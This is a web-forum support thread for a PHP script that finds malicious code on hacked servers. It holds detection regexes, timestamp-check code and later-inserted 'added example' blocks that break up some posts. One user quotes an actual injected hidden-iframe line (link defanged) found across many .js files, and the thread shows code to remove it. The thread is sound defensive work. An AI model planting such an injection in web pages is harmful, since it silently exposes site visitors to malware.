25 Years of Programming Community Forum
Author Topic: Support thread for "lookforbadguys" PHP script to find malicious text in files  (Read 4503 times)
SteveW
« on: September 17, 2011, 01:44:44 AM »

I've created this thread for bug reports, feature suggestions, other feedback, or questions about the "lookforbadguys.php" script at "PHP script to find malicious code on a hacked server".

You can start a new message thread, if you prefer.

The idea for a support thread was inspired by a helpful question that has already been asked by someone in a separate thread:

Exclude a folder, bad guy php script  
It discusses the use of regular expressions to exclude files by filename, partial path+filename, or full and unambiguous path+filename.

The brief "notes about regular expressions" in this post might be helpful if you are very new to the use of regular expressions.

Because the lookforbadguys script achieves much of its flexibility through the use of regular expressions, you might find the following resources helpful:

Regex Tutorials

Try starting here
http://www.phpfreaks.com/tutorial/regular-expressions-part1---basic-syntax

Also this popular page for another approach to the basics
http://gnosis.cx/publish/programming/regular_expressions.html

These next two resources are the regex tutorials for Perl. Although the Perl-specific code doesn't apply to PHP, the regex examples and walkthroughs are relevant and readable, and nearly the same as you use in PHP:

Quick tutorial: http://perldoc.perl.org/perlrequick.html
Longer tutorial: http://perldoc.perl.org/perlretut.html

Regex Reference Manuals

The text file http://www.pcre.org/pcre.txt (their home page is http://www.pcre.org) is the definitive and truly excellent reference to Perl Compatible Regular Expressions (it is the manpage for them). Skip the top half of the file and go to the section called PCREPATTERN. Although not a tutorial, it has lots of instructive examples.

This is the PCRE reference at php.net. It's rather formal and easiest to understand if you already know the material: http://us.php.net/manual/en/reference.pcre.pattern.syntax.php
« Last Edit: September 17, 2011, 04:38:30 AM by SteveW »
isd.jouie
« Reply #1 on: September 30, 2011, 12:14:58 AM »

Hi! Can you help me with this? I'm not a programmer and I don't know about MySQL. My site was hacked and all of my addon sites are compromised. I don't know what to do. I tried using your lookforbadguys.php on my site, but I don't know what to do after that. Here is the result after I ran the program..

Hope you can help me, please...
SteveW
« Reply #2 on: September 30, 2011, 03:14:25 PM »

Hello,

The first time you run the script (with the default settings), it shows you the snippets it thinks might be suspicious, and in what files it found them. You need to use your own judgment about the text that is displayed (combined with your knowledge of what text your pages normally contain) to decide whether each snippet actually is malicious or not. 

For each snippet that actually is malicious, open each file in a text editor and remove the code that the hacker put there. Use "code view" (HTML) to do that. Don't use a WYSIWYG editor.

There are some other things that are worth searching for in your files. They aren't included in the script's default settings because the things to search for are different for every site:

In the page at http://25yearsofprogramming.com/blog/2009/20091124.htm are instructions for how to get the Google Safe Browsing Diagnostic Report for your website. If your site is flagged there for malware and the report mentions malicious domains (websites) or IP addresses, create some new regular expression entries in the lookforbadguys script (in the $SuspiciousSnippets array) so the script can search your site for references to those domains or IP addresses. 

Then, even if your site is not flagged for malware, you can go to http://www.unmaskparasites.com/ and get a report of the websites from which your pages get external content. If any of those are suspicious (that is, you don't think your website should be pulling content from those sites, so the hacker probably put those references there), add regular expression entries in the $SuspiciousSnippets array for those, too, so the script can search for them, as well. 

That's basically it. The lookforbadguys script helps you find text that shouldn't be in your files, but it can't know for sure exactly what is suspicious and what's not. For you to make that decision, it usually requires you to examine the snippet and think about it. 
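The reply above says to turn the domains and IP addresses from a Safe Browsing or unmaskparasites report into new $SuspiciousSnippets entries. The following is an added example, not code from lookforbadguys.php, showing how to build such entries so that the dots in a hostname or IP address are matched literally and a short hostname does not match inside a longer, unrelated one. The hostnames, the IP address, the sample file contents and the functions HostPattern() and ScanFiles() are all constructed for this example; only the $SuspiciousSnippets array name comes from the script.

```php
<?php
// Added example (not part of lookforbadguys.php): turn the domains and IP
// addresses from a Safe Browsing or unmaskparasites report into entries
// that can be appended to the script's $SuspiciousSnippets array, then
// scan some constructed file contents with them.
// HostPattern(), ScanFiles(), $badHosts and $sampleFiles are this
// example's own names; only $SuspiciousSnippets comes from the script.

// Constructed list of indicators; placeholder names, not real malicious hosts.
$badHosts = array('evil-ads.example', 'stats-collector.example', '203.0.113.45');

function HostPattern($host)
{
    // preg_quote escapes the dots so "203.0.113.45" cannot match "203x0x113x45".
    // The lookbehind and lookahead keep "evil-ads.example" from matching inside
    // "not-evil-ads.example.org". '@' is used as the delimiter, like the script's
    // own patterns, so preg_quote is told to escape it too.
    return '@(?<![\w.-])' . preg_quote($host, '@') . '(?![\w-])@i';
}

$SuspiciousSnippets = array();
foreach ($badHosts as $host) {
    $SuspiciousSnippets[] = HostPattern($host);
}

// Constructed sample files (filename => contents) standing in for the
// file list the script would build from the web root.
$sampleFiles = array(
    'index.html' => "<html><body>\n<script src=\"http://EVIL-ADS.example/x.js\"></script>\n</body></html>",
    'about.html' => "<p>Contact us at not-evil-ads.example.org</p>",
    'footer.php' => "<?php echo '<iframe src=\"http://203.0.113.45/c.php\">';",
);

function ScanFiles(array $files, array $patterns)
{
    $hits = array();
    foreach ($files as $name => $contents) {
        foreach ($patterns as $pattern) {
            // PREG_OFFSET_CAPTURE returns [matched text, byte offset] pairs.
            if (preg_match($pattern, $contents, $m, PREG_OFFSET_CAPTURE)) {
                $hits[] = array(
                    'file'    => $name,
                    'pattern' => $pattern,
                    'offset'  => $m[0][1],
                    'match'   => $m[0][0],
                );
            }
        }
    }
    return $hits;
}

foreach (ScanFiles($sampleFiles, $SuspiciousSnippets) as $hit) {
    printf("%s @%d matched %s : %s\n", $hit['file'], $hit['offset'], $hit['pattern'], $hit['match']);
}
```

Run from the command line with php, this reports index.html (the upper-case host still matches because of the i modifier) and footer.php (the IP address), and stays silent on about.html even though it contains the text evil-ads.example as part of a different hostname. Without preg_quote, a pattern built straight from "203.0.113.45" would treat each dot as "any character" and could match unrelated text.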
wilson
« Reply #3 on: February 04, 2012, 09:36:32 AM »

Thought I'd put this here to see if anyone recognized it. This comes up over and over when I run lookforbadguys. Thing is, I don't have Analytics or Amazon on the page - I've been removing both (Analytics/Amazon) code and I believe I've eliminated 99% from the site's pages. Figure there might be something somewhere I missed, but ... ? Anyway, maybe somebody knows exactly what this script/result represents. Thanks

Code:
@<script[^>]+src=[\x22\x27]?http://(?!(www\.(google-analytics|gmodules)\.com|pagead2\.googlesyndication\.com/pagead/|(ws\.|((www|cls)\.assoc-))amazon\.com/))[^>]*>@i
SteveW
« Reply #4 on: February 04, 2012, 09:57:54 AM »

Hello wilson,

That regular expression identifies any externally-sourced script (usually JavaScript) in your page that comes from someplace other than google or amazon. Scripts from google or amazon are assumed safe.

Apparently, your page has a script in it with this tag:

<script src=http://example.com/path/filename.js>

and example.com is not google or amazon.

If example.com is not your site and it's not a site that you intentionally load a script from, that snippet is suspicious and could have been injected into your page by a hack.

The text you posted, from the lefthand side of the report page, is showing you the regular expression that was matched. On the righthand side of the page should be the suspicious snippet. Examine the suspicious snippet on the righthand side to see what site "example.com" really is. Determine if it's a snippet that you intentionally put in your page, or if it was placed there maliciously by somebody else.
wilson
« Reply #5 on: February 04, 2012, 11:36:46 AM »

Okay, so the "!" is an - if not.

Can I increase the number of characters for output? If so what line? I see output color but not #. Some script addresses (black text color) are cut off before end tag. Thanks
SteveW
« Reply #6 on: February 04, 2012, 01:45:20 PM »

Quote
Okay, so the "!" is an - if not.

Yes, right - the (?!  ) expression means "not followed by".

Quote
Can I increase the number of characters for output?

At about line 425 are these lines:

Code:
# THE 80 CHARACTERS AFTER START OF MATCH INSTANCE
$s = substr($file, $occurrence[1], 80);


You can change the 80 to a larger number to capture and output more characters after the start of the match.
wilson
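To make Reply #4 and Reply #6 concrete, here is an added example (not code from lookforbadguys.php) that runs the external-script pattern wilson posted over a constructed page and cuts out the snippet the way the script's substr() call does. $ExternalScriptPattern, $SnippetLength, FindSnippets() and the sample page are this example's own names and data; the regular expression itself is the one from the thread.

```php
<?php
// Added example, not part of lookforbadguys.php: shows what the
// "externally-sourced script" pattern from the thread matches, and how the
// snippet shown on the right of the report is cut out of the file content.
// $SnippetLength is this example's name for the 80 in the script's substr() call.

$ExternalScriptPattern = '@<script[^>]+src=[\x22\x27]?http://(?!(www\.(google-analytics|gmodules)\.com|pagead2\.googlesyndication\.com/pagead/|(ws\.|((www|cls)\.assoc-))amazon\.com/))[^>]*>@i';

$SnippetLength = 80;   // raise this to see more of each match

// Constructed page content. Only the third <script> is reported: the first
// two come from hosts the lookahead treats as safe, and the fourth uses
// https://, which the pattern as written does not look for.
$page = <<<'HTML'
<html><head>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
<script src='http://ws.amazon.com/widgets/q?ServiceVersion=20070822'></script>
<script src=http://example.com/path/filename.js></script>
<script src="https://cdn.example.org/lib.js"></script>
</head></html>
HTML;

function FindSnippets($content, $pattern, $length)
{
    $snippets = array();
    // PREG_OFFSET_CAPTURE gives [matched text, byte offset] pairs; the offset
    // is what the script uses as $occurrence[1] when it cuts the snippet.
    if (preg_match_all($pattern, $content, $matches, PREG_OFFSET_CAPTURE)) {
        foreach ($matches[0] as $occurrence) {
            $snippets[] = array(
                'offset'  => $occurrence[1],
                'snippet' => substr($content, $occurrence[1], $length),
            );
        }
    }
    return $snippets;
}

foreach (FindSnippets($page, $ExternalScriptPattern, $SnippetLength) as $hit) {
    // Encode before printing, as the script does for its web report, so a
    // malicious tag is displayed rather than executed.
    echo $hit['offset'], ': ', htmlentities($hit['snippet'], ENT_QUOTES), "\n";
}
```

Two things worth noticing when you adapt this. First, the pattern only looks for src values starting with http://, so a script loaded over https:// or from a protocol-relative //host/ URL would not be reported by it; if your pages use those, add a corresponding entry. Second, widening $SnippetLength is the right fix when the snippet is cut off before the closing tag, because substr() simply takes that many bytes after the start of the match.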
« Reply #7 on: February 04, 2012, 03:24:29 PM »

Perfect, thanks
tarlachmoorhouse
« Reply #8 on: April 06, 2012, 12:45:13 AM »

I've been using the script to clean out a hacked Joomla site, and I'm wondering if it would make sense and be possible to add a date range option in the file selection, so that if you know when a hack occurred you could use it to look specifically at files changed from the date of the attack onwards, and/or be able to exclude files edited after a specific date, i.e. excluding ones you know you have replaced/corrected during the clean-up process?

Thanks

John
SteveW
« Reply #9 on: April 06, 2012, 07:39:08 AM »

John, thank you for your suggestion. I can see that the information would sometimes be useful, but to make it a built-in feature would make this already complicated script even harder to use.

Finding files modified within a range of dates/times could be quite useful (and I'll deal with it below), but it's not directly related to whether the files actually do contain suspicious snippets, which would already be caught by the searches that the script currently does.

Excluding files that you have already edited isn't necessarily as safe as it sounds, because the files could have been re-hacked since you edited them. If they're really clean, they shouldn't be listed in a new suspicious snippets search (except for any false positives), so they shouldn't have to be excluded.

----

But it is possible to add file timestamp checking into the PHP code. One place you could do it is in the BuildFileList() function, to make a file be either excluded or included based on its timestamp. Or you could create a whole new section of the script that first uses the current BuildFileList() to build the file list normally, and then output a report based on the timestamps of the files.

Although I don't want to add the feature to the default version of the script, I have created the following example code that shows usage of the key PHP functions that you'd probably need for adding a timestamp checking feature to your copy of the script. This code outputs a message if the file's timestamp falls within the "suspicious" range:

Code:
# You must either set this explicitly or endure PHP warnings about it.
# Make sure the timezone you specify IS the one the server is using for file timestamps.

date_default_timezone_set('America/Los_Angeles');

# Use exactly this format for your timestamps because
# it is the same format used below in the date() function.

$TimeRangeStart = "2012-04-01 05:00:00";
$TimeRangeEnd   = "2012-04-06 19:30:00";

# You'd normally get the filename from a list...
$filename = 'test.php';

$lastmod = date("Y-m-d H:i:s", filemtime($filename));
if(($lastmod >= $TimeRangeStart) && ($lastmod <= $TimeRangeEnd))
{
	echo "Suspicious timestamp: $lastmod " . realpath($filename) . "\n";

	# AN ALTERNATIVE, FILENAME ONLY.
	#echo "Suspicious timestamp: $lastmod $filename\n";

	# OR, IF IT IS FOR OUTPUT ON WEB PAGE, CLEAN AND COLORIZE THE TEXT:
	#echo CleanColorText("Suspicious timestamp: $lastmod ", 'red') . CleanColorText(realpath($filename), 'black');
}

----

On a linux server, it's also possible to use linux commands directly to find files modified within a certain time range, and it's possible to use PHP to launch those commands and display the result. The key is the linux "find" command, described in detail at http://linux.die.net/man/1/find

This is an example of some prototype code, but I can't really recommend using find or using PHP shell_exec unless you're comfortable with them already. Nonetheless, it is an available method for those who want to do some exploring, studying, and experimenting:


Code:
# FIND REGULAR FILES MODIFIED WITHIN THE PAST 10 DAYS
$cmd = 'find ./ -type f -mtime -10';

$result = shell_exec($cmd);

# CLEAN RESULT FOR OUTPUT ON WEB PAGE
echo htmlentities($result, ENT_QUOTES);
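The reply above shows the timestamp check for a single file and suggests hooking it into the file list that BuildFileList() produces. As an added example (not code from lookforbadguys.php), the following applies the same idea to a whole list of files, compares Unix timestamps instead of formatted strings, and creates three scratch files with deliberately set modification times so it runs on its own. FilesModifiedBetween(), the scratch directory and the three file names are this example's own.

```php
<?php
// Added example, not part of lookforbadguys.php: filters a list of files by
// modification time, the way a time-window check fed from BuildFileList()
// could. FilesModifiedBetween() is this example's own function; the three
// files are created below in a temporary directory with constructed
// timestamps so that the example runs stand-alone.

date_default_timezone_set('America/Los_Angeles'); // must match the server's zone

function FilesModifiedBetween(array $files, $start, $end)
{
    // Compare Unix timestamps rather than "Y-m-d H:i:s" strings, so the
    // window can be written in any format strtotime() understands.
    $startTs = strtotime($start);
    $endTs   = strtotime($end);
    if ($startTs === false || $endTs === false || $startTs > $endTs) {
        throw new InvalidArgumentException("Bad time range: $start .. $end");
    }
    $hits = array();
    foreach ($files as $file) {
        $mtime = filemtime($file);
        if ($mtime === false) {
            continue; // unreadable or vanished since the list was built
        }
        if ($mtime >= $startTs && $mtime <= $endTs) {
            $hits[$file] = date('Y-m-d H:i:s', $mtime);
        }
    }
    return $hits;
}

// Build a scratch directory with one file per case (constructed data).
$dir = sys_get_temp_dir() . '/lfbg_' . getmypid();
mkdir($dir);
$cases = array(
    'old.php'      => '2012-03-20 12:00:00', // before the window
    'hacked.php'   => '2012-04-03 02:15:00', // inside the window
    'restored.php' => '2012-04-07 09:00:00', // after the window
);
$files = array();
foreach ($cases as $name => $when) {
    $path = "$dir/$name";
    file_put_contents($path, "<?php // $name\n");
    touch($path, strtotime($when)); // set the mtime deliberately
    $files[] = $path;
}

$suspicious = FilesModifiedBetween($files, '2012-04-01 05:00:00', '2012-04-06 19:30:00');
foreach ($suspicious as $path => $lastmod) {
    echo "Suspicious timestamp: $lastmod ", realpath($path), "\n";
}

// Remove the scratch files again.
foreach ($files as $path) { unlink($path); }
rmdir($dir);
```

Only hacked.php is listed. One caveat that supports the point made above about not excluding files you have already edited: touch() sets the modification time exactly as this example does, so anyone with write access to the site can give a modified file an old mtime. A file outside the window is therefore not proven clean, and the content searches the script already does remain the primary check; the file's change time (filectime()), which is updated by the kernel and cannot be set with touch, is a useful second opinion when the two disagree.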
SteveW
« Reply #10 on: April 09, 2012, 06:58:59 AM »

On further reflection and with a fresh start on a new day, I found a way to report useful timestamp information without making all users go through the hassle of defining a timeframe to report on even if they don't have one in mind or aren't interested in a report on that information.

This morning, I published a new version of lookforbadguys with these added features:

1) Wherever a filename is listed on a line (in all the reports), its timestamp is also displayed.  

2) There's a new search routine to find all files that were modified within a user-defined time period of interest. You set the starting and ending dates/times in the User Configuration section. If the user hasn't configured starting and ending dates different from the defaults, the script simply skips the time window search.

Thank you for your suggestions.
malikhemani
« Reply #11 on: October 08, 2012, 11:37:32 AM »

Hello Steve, thank you for all the info on website security. However, recently our entire hosting account was hacked with a line of code inside each one of the .js files. We have close to 1000 .js files because of multiple Joomla and WP installs. How can we modify the handler inside LookingForBadGuys to remove the below code? Your help is much appreciated.

document.write('<iframe src="hxxp://spottystomach.net/Softgoods?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

Thanks

[Reason for edit: hxxp to deactivate link]
« Last Edit: October 09, 2012, 01:10:37 AM by SteveW »
SteveW
« Reply #12 on: October 09, 2012, 01:24:40 AM »

I would suggest hiring a PHP programmer or web designer who is good at PHP to do this for you.
I am not available at this time to help with this type of problem.
The key PHP function you will need is preg_replace.
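Since the reply above points at preg_replace without showing its use, here is an added example (not the script's code, and not a general-purpose cleaner) of the approach for the case in Reply #11: a document.write('<iframe ...>') line injected into every .js file under a directory. The placeholder host injected.example stands in for the real domain in the post; RemoveInjectedIframe(), the dry-run flag, the .bak backup convention and the scratch directory are this example's own. It is written to be run from the command line with php, not through the hacked web server.

```php
<?php
// Added example, not code from lookforbadguys.php: removes an injected
// document.write('<iframe ...>') statement from every .js file under a
// directory with preg_replace, doing a dry run first and keeping a .bak copy
// of every file it changes. "injected.example" is a placeholder host;
// RemoveInjectedIframe() and the sample tree are this example's own.

$injectedHost = 'injected.example';

// Match the whole document.write(...) statement, but only when the iframe
// source is on the injected host, so legitimate document.write calls survive.
// \1 forces the closing quote to be the same kind as the opening one.
$pattern = '@document\.write\(\s*([\x22\x27])<iframe\s+src=[\x22\x27]?https?://'
         . preg_quote($injectedHost, '@')
         . '[^\r\n]*?</iframe>\1\s*\);?[ \t]*\r?\n?@i';

function RemoveInjectedIframe($dir, $pattern, $dryRun = true)
{
    $changed = array();
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($iter as $fileInfo) {
        if (strtolower($fileInfo->getExtension()) !== 'js') {
            continue;                       // .bak copies are skipped too
        }
        $path   = $fileInfo->getPathname();
        $before = file_get_contents($path);
        $after  = preg_replace($pattern, '', $before, -1, $count);
        if ($after === null) {
            throw new RuntimeException("preg_replace failed on $path: " . preg_last_error());
        }
        if ($count > 0) {
            $changed[$path] = $count;
            if (!$dryRun) {
                copy($path, $path . '.bak');   // keep the hacked version as evidence
                file_put_contents($path, $after);
            }
        }
    }
    return $changed;
}

// Constructed sample tree: one infected file, one clean one.
$dir = sys_get_temp_dir() . '/lfbg_js_' . getmypid();
mkdir("$dir/media/js", 0700, true);
file_put_contents("$dir/media/js/site.js",
    "function init() { return 1; }\n"
    . "document.write('<iframe src=\"http://injected.example/Softgoods?8\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height=\"2\" width=\"2\"></iframe>');\n"
    . "init();\n");
file_put_contents("$dir/media/js/clean.js",
    "document.write('<p>legitimate</p>');\n");

// 1) Dry run: list what would change, touch nothing.
foreach (RemoveInjectedIframe($dir, $pattern, true) as $path => $n) {
    echo "would remove $n injection(s) from $path\n";
}
// 2) Real run, then show the cleaned file.
RemoveInjectedIframe($dir, $pattern, false);
echo file_get_contents("$dir/media/js/site.js");

// Remove the scratch tree again.
foreach (glob("$dir/media/js/*") as $f) { unlink($f); }
rmdir("$dir/media/js"); rmdir("$dir/media"); rmdir($dir);
```

The dry run reports site.js only; after the real run site.js contains just the init function and its call, clean.js is untouched, and site.js.bak holds the original. Before using something like this on a real site, run the dry run and read the list, keep the backups until the site has been verified, and remember that removing the injected line does not close whatever let the attacker write to a thousand files in the first place.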